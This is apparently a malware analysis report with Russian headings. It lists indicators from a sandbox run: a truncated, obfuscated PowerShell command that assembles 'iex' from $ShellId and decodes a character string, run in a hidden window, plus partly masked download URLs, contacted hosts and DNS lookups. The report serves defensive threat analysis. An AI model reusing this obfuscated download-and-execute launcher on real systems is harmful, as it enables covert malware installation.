Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $sHeLLID[1]+$sheLLiD[13]+'x') (" $(SeT-iTEm 'vArIabLe:ofs' '' ) "+[sTRing]('42%74,69u127!71u74A111,46N51%46,96!107!121!35,97&108!100M107%109u122%46&124M111%96j106!97A99A53!42f79N123,86A101&...
- 'ba####apital.com':80
- 'al###ost.com':80
- 'di####airclaims.com':80
- 'di####airclaims.com':443
- http://www.ba####apital.com/c8CouZB/
- http://www.di####airclaims.com/haLhb0U/
- 'di####airclaims.com':443
- DNS ASK ba####apital.com
- DNS ASK al###ost.com
- DNS ASK de####esellers.tk
- DNS ASK di####airclaims.com
- DNS ASK is####tokaporta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $sHeLLID[1]+$sheLLiD[13]+'x') (" $(SeT-iTEm 'vArIabLe:ofs' '' ) "+[sTRing]('42%74,69u127!71u74A111,46N51%46,96!107!121!35,97&108!100M107%109u122%46&124M111%96j106!97A99A53!42f79N123,86A101&...' (со скрытым окном)